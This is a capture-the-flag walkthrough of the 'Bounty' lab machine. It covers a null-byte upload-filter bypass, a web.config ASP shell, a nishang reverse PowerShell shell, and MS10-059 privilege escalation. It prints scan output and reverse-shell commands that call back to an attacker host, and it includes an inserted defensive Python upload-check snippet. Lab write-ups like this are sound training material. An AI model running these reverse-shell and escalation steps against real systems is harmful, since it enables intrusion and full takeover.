The box only had port 80 running, which hosted an application that allows uploading files while blocking asp, aspx and a few other file extensions.
I was able to bypass the upload filter using a null byte (%00.jpg), but the application generated an error giving a clue about something related to web.config.
After some research on web.config, I found an article describing how to upload a web.config file with ASP code embedded, and I was able to get a shell.
For privilege escalation, I was able to get SYSTEM using MS10-059.
# Nmap 7.80 scan initiated Sun Mar 8 22:08:29 2020 as: nmap -Pn -sC -sV -p 80 -oN nmap/Bounty_nmap.txt 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 8 22:08:50 2020 -- 1 IP address (1 host up) scanned in 21.20 seconds
# Nmap 7.80 scan initiated Sun Mar 8 22:08:50 2020 as: nmap -Pn -sU -oN nmap/Bounty.udp 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up.
All 1000 scanned ports on 10.10.10.93 are open|filtered
# Nmap done at Sun Mar 8 22:12:12 2020 -- 1 IP address (1 host up) scanned in 201.34 seconds
Enumerating HTTP
Port 80 just shows a picture. I saved the picture as merling.jpg and used strings, steghide and exiftool but didn't find anything.
Nikto
Nothing much was found with Nikto.
nikto -host http://10.10.10.93
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.93
+ Target Hostname: 10.10.10.93
+ Target Port: 80
+ Start Time: 2020-03-08 22:18:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-03-08 22:24:28 (GMT-4) (344 seconds)
---------------------------------------------------------------------------
I tried uploading files with ASP and ASPX extensions and it failed. But when I uploaded the merling.jpg file it worked. Based on that, I used Burp proxy to intercept the request and used a null byte (%00) to attempt to bypass the upload filter.
Bypassing the upload filter using null byte %00
When I tried to execute the shellie.aspx file at http://10.10.10.93/UploadedFiles/shellie.aspx I got the error shown below.
I had no idea what to do from here, so I googled "IIS 7.5 web.config exploit" and, to my surprise, I found the following link stating that we can actually upload a *.config file with ASP code and it would work.
Explanation of web.config as quoted from the link above:
Web.config
What is a web.config file?
A web.config file lets you customize the way your site or a specific directory on your site behaves. For example, if you place a web.config file in your root directory, it will affect your entire site. If you place it in a /content directory, it will only affect that directory.
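As an added example that is not part of this writeup, the Python below models the two upload-filter weaknesses this box exposed (the null byte truncating the name after the check, and a web.config name passing an extension denylist) next to a hardened allowlist check; the extension allowlist, the reserved-name set and the function names are my own assumptions, not the application's code.

```python
import os
from typing import Tuple
from urllib.parse import unquote

# Extensions the upload endpoint is meant to accept (assumed allowlist).
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}
# Names IIS/ASP.NET treats as configuration; an upload endpoint must never
# let a client write them, whatever their "extension" looks like.
RESERVED_BASENAMES = {"web.config", "global.asax", "machine.config"}

def naive_is_allowed(filename: str) -> bool:
    """Denylist check of the kind the box had: inspects only the visible
    extension of the submitted name and rejects a few script types."""
    return not filename.lower().endswith((".asp", ".aspx", ".asa", ".cer"))

def stored_name_after_truncation(filename: str) -> str:
    """Model a native (C string) file API: everything after the first NUL
    byte is dropped, so the name on disk differs from the name checked."""
    return filename.split("\x00", 1)[0]

def is_safe_upload(filename: str) -> Tuple[bool, str]:
    """Hardened check: no control bytes, no client-supplied path, exactly
    one allowlisted extension, and never an IIS configuration file name."""
    if any(ord(c) < 0x20 for c in filename):      # catches the %00 byte
        return False, "control character in name"
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if base in ("", ".", ".."):
        return False, "empty or relative name"
    if base.lower() in RESERVED_BASENAMES:
        return False, "reserved IIS configuration file name"
    root, ext = os.path.splitext(base)
    if ext.lower() not in ALLOWED_EXTENSIONS:
        return False, "extension %r not allowed" % ext
    if os.path.splitext(root)[1]:                 # e.g. shellie.aspx.jpg
        return False, "multiple extensions"
    return True, "ok"

def check_raw_filename(raw: str) -> dict:
    """Run both checks on a filename exactly as it arrives in the request
    (still %-encoded), decoding it the way the server would first."""
    decoded = unquote(raw)
    return {"naive_allowed": naive_is_allowed(decoded),
            "name_on_disk": stored_name_after_truncation(decoded),
            "hardened": is_safe_upload(decoded)}
```

Running check_raw_filename("shellie.aspx%00.jpg") shows the denylist accepting the name while the stored name becomes shellie.aspx, and the hardened check rejecting it before any path or extension logic runs.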
Executed it via http://10.10.10.93/UploadedFiles/web.config
Started the listener on port 8008 (I edited the nishang reverse TCP script)
Got a shell as merlin
Started python http server
# To serve the nishang reverse PowerShell script
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.93 - - [09/Mar/2020 00:21:47] "GET /pwsh.ps1 HTTP/1.1" 200 -
# Listener to capture the shell
rlwrap nc -lnvp 8008
listening on [any] 8008 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>whoami
bounty\merlin
PS C:\users\merlin\desktop> systeminfo
Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 3/9/2020, 5:22:56 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,586 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,594 MB
Virtual Memory: In Use: 501 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93
Privilege Escalation
I used the Windows Exploit Suggester.
./windows-exploit-suggester.py -d 2020-03-06-mssb.xls -i sysinfo_bounty
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
I used MS10-059. A Google search for "MS10-059 github" takes you to the following link with an .exe executable.
PS C:\users\merlin\documents> .\MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->
Usage: Chimichurri.exe ipaddress port <BR>
Started a Listener
rlwrap nc -lnvp 9002
listening on [any] 9002 ...
Got a reverse shell as SYSTEM
# On the target box
PS C:\users\merlin\documents> .\MS10-059.exe 10.10.14.3 9002
# On my Kali box
rlwrap nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.93] 49181
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\users\merlin\documents>whoami
whoami
nt authority\system
C:\users\merlin\documents>